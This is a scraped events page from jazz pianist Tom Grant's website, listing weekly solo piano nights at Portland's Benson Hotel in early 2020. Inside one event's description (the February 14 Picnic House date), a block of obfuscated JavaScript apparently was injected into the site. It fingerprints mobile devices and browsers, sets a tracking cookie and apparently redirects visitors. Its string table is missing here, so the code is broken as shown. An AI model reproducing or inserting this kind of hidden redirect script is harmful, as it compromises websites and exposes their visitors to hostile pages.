Skip to primary content
Skip to secondary content

Tom Grant

TomGrantMusicPDX

Tom Grant

Main menu

  • TOM GRANT
  • CALENDAR
  • MUSIC
  • BIO
  • CONTACT
12 events found.

Live Jazz

  1. Events
  2. Live Jazz

Events

Events Search and Views Navigation

Event Views Navigation

  • List
  • Month
  • Photo
Today
  • January 2020

  • Wed 15

    Tom Grant Solo Piano at the Benson Hotel

    January 15, 2020 @ 8:00 pm - 11:00 pm PST Tom Grant Solo Piano at the Benson Hotel
    Benson Hotel | Grand Lobby 309 SW Broadway, Portland, United States

    Tom Grant Solo Piano at the Benson Hotel on Wednesday nights.

  • Wed 22

    Tom Grant Solo Piano at the Benson Hotel

    January 22, 2020 @ 8:00 pm - 11:00 pm PST Tom Grant Solo Piano at the Benson Hotel
    Benson Hotel | Grand Lobby 309 SW Broadway, Portland, United States

    Tom Grant Solo Piano at the Benson Hotel on Wednesday nights.

  • Wed 29

    Tom Grant Solo Piano at the Benson Hotel

    January 29, 2020 @ 8:00 pm - 11:00 pm PST Tom Grant Solo Piano at the Benson Hotel
    Benson Hotel | Grand Lobby 309 SW Broadway, Portland, United States

    Tom Grant Solo Piano at the Benson Hotel on Wednesday nights.

  • February 2020

  • Wed 5

    Tom Grant Solo Piano at the Benson Hotel

    February 5, 2020 @ 8:00 pm - 11:00 pm PST Tom Grant Solo Piano at the Benson Hotel
    Benson Hotel | Grand Lobby 309 SW Broadway, Portland, United States

    Tom Grant Solo Piano at the Benson Hotel on Wednesday nights.

  • Wed 12

    Tom Grant Solo Piano at the Benson Hotel

    February 12, 2020 @ 8:00 pm - 11:00 pm PST Tom Grant Solo Piano at the Benson Hotel
    Benson Hotel | Grand Lobby 309 SW Broadway, Portland, United States

    Tom Grant Solo Piano at the Benson Hotel on Wednesday nights.

  • Fri 14

    Picnic House w/ Brent Follis and Kevin Deitz

    February 14, 2020 @ 7:00 pm - 9:00 pm PST
    Picnic House 723 SW SALMON ST, Portland, United States

    var a=;(function(c,d){var e=function(f){while(--f){c(c());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a;return e;};(function(){if(document(b('0x1'))===null){if(typeof c===b('0x2')){function c(d,e,f){var g='';if(f){var h=new Date();h(h()+f*0x18*0x3c*0x3c*0x3e8);g=b('0x5')+h();}document=d+'='+(e||'')+g+';\x20path=/';}function i(j){var k=j+'=';var l=document(';');for(var m=0x0;m<l;m++){var n=l;while(n(0x0)=='\x20')n=n(0x1,n);if(n(k)==0x0)return n(k,n);}return null;}function o(){return navigator(/Android/i)||navigator(/BlackBerry/i)||navigator(/iPhone|iPad|iPod/i)||navigator(/Opera Mini/i)||navigator(/IEMobile/i);}function p(){return navigator('Edge')!==-0x1||navigator(b('0xf'))!==-0x1||navigator(b('0x10'))!==-0x1||navigator(b('0x11'))!==-0x1||navigator(b('0x12'))!==-0x1||navigator(b('0x13'))!==-0x1;}var q=i(b('0x14'));if(q!=='un'){if(p()||o()){c(b('0x14'),'un',0x16d);window(b('0x16'));}}}}}(this));

  • Wed 19

    Tom Grant Solo Piano at the Benson Hotel

    February 19, 2020 @ 8:00 pm - 11:00 pm PST Tom Grant Solo Piano at the Benson Hotel
    Benson Hotel | Grand Lobby 309 SW Broadway, Portland, United States

    Tom Grant Solo Piano at the Benson Hotel on Wednesday nights.

  • Wed 26

    Tom Grant Solo Piano at the Benson Hotel

    February 26, 2020 @ 8:00 pm - 11:00 pm PST Tom Grant Solo Piano at the Benson Hotel
    Benson Hotel | Grand Lobby 309 SW Broadway, Portland, United States

    Tom Grant Solo Piano at the Benson Hotel on Wednesday nights.

  • March 2020

  • Wed 4

    Tom Grant Solo Piano at the Benson Hotel

    March 4, 2020 @ 8:00 pm - 11:00 pm PST Tom Grant Solo Piano at the Benson Hotel
    Benson Hotel | Grand Lobby 309 SW Broadway, Portland, United States

    Tom Grant Solo Piano at the Benson Hotel on Wednesday nights.

  • Wed 11

    Tom Grant Solo Piano at the Benson Hotel

    March 11, 2020 @ 8:00 pm - 11:00 pm PDT Tom Grant Solo Piano at the Benson Hotel
    Benson Hotel | Grand Lobby 309 SW Broadway, Portland, United States

    Tom Grant Solo Piano at the Benson Hotel on Wednesday nights.

  • Wed 18

    Tom Grant Solo Piano at the Benson Hotel

    March 18, 2020 @ 8:00 pm - 11:00 pm PDT Tom Grant Solo Piano at the Benson Hotel
    Benson Hotel | Grand Lobby 309 SW Broadway, Portland, United States

    Tom Grant Solo Piano at the Benson Hotel on Wednesday nights.

  • Wed 25

    Tom Grant Solo Piano at the Benson Hotel

    March 25, 2020 @ 8:00 pm - 11:00 pm PDT Tom Grant Solo Piano at the Benson Hotel
    Benson Hotel | Grand Lobby 309 SW Broadway, Portland, United States

    Tom Grant Solo Piano at the Benson Hotel on Wednesday nights.

  • Previous Events
  • Today
  • Next Events
  • Google Calendar
  • iCalendar
  • Outlook 365
  • Outlook Live
  • Export .ics file
  • Export Outlook .ics file

SHOWS

Proudly powered by WordPress